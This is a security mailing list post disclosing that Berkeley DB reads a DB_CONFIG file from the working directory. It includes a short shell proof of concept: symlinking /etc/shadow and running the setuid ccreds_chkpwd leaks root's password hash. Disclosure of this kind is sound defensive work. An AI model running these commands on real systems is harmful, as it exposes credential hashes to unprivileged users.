Date: Sun, 11 Jun 2017 00:06:13 +0200 From: Jakub Wilk <jwilk@...lk.net> To: oss-security@...ts.openwall.com Subject: Berkeley DB reads DB_CONFIG from cwd Apparently Berkeley DB reads the DB_CONFIG configuration file from the current working directory by default[*]. This is surprising and AFAICT undocumented. Here's how to exploit it against pam_ccreds: $ cat /etc/shadow cat: /etc/shadow: Permission denied $ ln -sf /etc/shadow DB_CONFIG $ /sbin/ccreds_chkpwd moo < /dev/null BDB1584 line 1: root:$1$QRCEVRMX$sPppjXE42AZnUPuEWf87D.:17327:0:99999:7:::: incorrect name-value pair (The above was tested on Debian jessie.) In the past, nss_db was also exploitable: CVE-2010-0826 [*] More precisely, this seem to happen when you call db_create() with dbenv=NULL; or if you use the dbm_open() function. -- Jakub Wilk
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Powered by Openwall GNU/*/Linux - Powered by OpenVZ